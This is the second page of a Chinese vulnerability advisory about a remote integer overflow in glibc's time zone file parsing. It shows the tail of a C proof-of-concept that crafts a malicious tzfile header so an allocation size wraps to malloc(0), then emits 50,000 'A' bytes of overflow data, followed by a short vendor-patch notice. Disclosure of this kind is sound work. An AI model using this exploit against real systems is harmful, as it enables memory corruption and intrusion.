GNU glibc时区解析远程整数溢出漏洞(2)

日期:2020-06-08 栏目:程序人生 浏览:

total_size = evil1 * (sizeof(time_t) + 1);
        total_size = ((total_size + __alignof__ (struct ttinfo) - 1)
                & ~(__alignof__ (struct ttinfo) - 1));

/* value of chars, to get a malloc(0) */
        evil2 = 0 - total_size;
        PUT_32BIT_MSB(evil.tzh_charcnt, evil2);
        p = (char *)&evil;
        for (i = 0; i < sizeof(evil); i++)
                printf("%c", p[i]);

/* data we overflow with */
        for (i = 0; i < 50000; i++)
                printf("A");
}

建议:
--------------------------------------------------------------------------------
厂商补丁:

GNU
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

上一篇:Open Handset Alliance Android多个远程安全漏洞
下一篇:Yahoo! Messenger v11.5缓冲区溢出漏洞

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwdxdg.html

相关推荐